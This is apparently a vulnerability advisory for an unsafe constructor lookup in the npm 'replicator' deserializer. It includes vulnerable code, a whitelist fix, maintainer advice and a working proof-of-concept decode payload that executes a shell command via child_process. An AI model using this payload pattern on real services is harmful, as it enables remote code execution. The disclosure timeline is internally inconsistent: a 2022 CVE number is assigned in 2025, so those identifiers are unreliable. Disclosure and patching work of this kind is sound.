# Replicant: When Deserialization Starts Writing Your Scripts ## Vulnerability Overview **Replicant** is an npm package for advanced JavaScript serialization and deserialization. This vulnerability (CVE-2022-2265) exists in its `decode` process: when reconstructing error objects, Replicant trusts attacker-controlled data, using the `name` field from serialized input to select a constructor from the global scope. This transforms deserialization from data processing into behavior shaping. **Vulnerability Category** - CVE: CVE-2022-2265 - CWE-502: Deserialization of Untrusted Data - Impact: Code execution primitive through unsafe constructor selection - Component: Error transformation logic in `replicator` decoding pipeline ## Impact Scope - Replicant is widely used with approximately **1 million** monthly downloads - Attackers can control the `name` field to select arbitrary global constructors - The `message` field can serve as function body input - The decoded return value is invoked, leading to remote code execution ## Vulnerable Code (Pre-Fix) ```javascript var Ctor = GLOBAL[val.name] || Error; var err = new Ctor(val.message); ``` Where `val.name` comes from untrusted input, allowing attackers to influence which constructor is instantiated. ## POC Code ```javascript const Replicator = require('replicator'); const replicator = new Replicator(); replicator.decode( '{"ctor":"Error","data":{"name":"Function","message":"require(\\\'child_process\\\').execSync(\'open /System/Applications/Calculator.app\')"}}' )(); ``` **Payload Analysis:** - `name` is attacker-controlled, set to `"Function"` - `message` becomes the function body input - The decoded return value is invoked ## Fix Solution (PR #19) Replace open global lookup with a constructor whitelist: ```javascript var SAFE_ERROR_CTORS = { 'Error': Error, 'EvalError': EvalError, 'RangeError': RangeError, 'ReferenceError': ReferenceError, 'SyntaxError': SyntaxError, 'TypeError': TypeError, 'URIError': URIError }; var Ctor = SAFE_ERROR_CTORS[val.name] || Error; var err = new Ctor(val.message); ``` **Core Fix Principles:** 1. **Explicit Type Whitelist**: Only allow known-safe error constructors 2. **Safe Default**: Unknown values fall back to `Error` instead of resolving arbitrary global objects ## Practical Recommendations **When Maintaining Serialization/Deserialization Logic:** - Never parse constructors from untrusted strings via the global scope - Maintain strict allowlists for each polymorphic type path - Validate types and structures before reconstruction - Include negative security tests for unexpected constructor names **When Using Replicant in Projects:** - Upgrade to a version containing PR #19 - Treat decoded objects as untrusted input until validated by your own logic - Audit downstream usage patterns for locations where decoded values are invoked or dynamically executed ## Disclosure Timeline | Date | Event | |:---|:---| | 2021 | Checkmarx discloses CVE-2021-33420 | | 2025-01-29 | "Replicant" discovered and reported | | 2025-02-05 | PR #19 introduces constructor whitelist fix | | 2025-02-10 | CVE-2022-2265 assigned |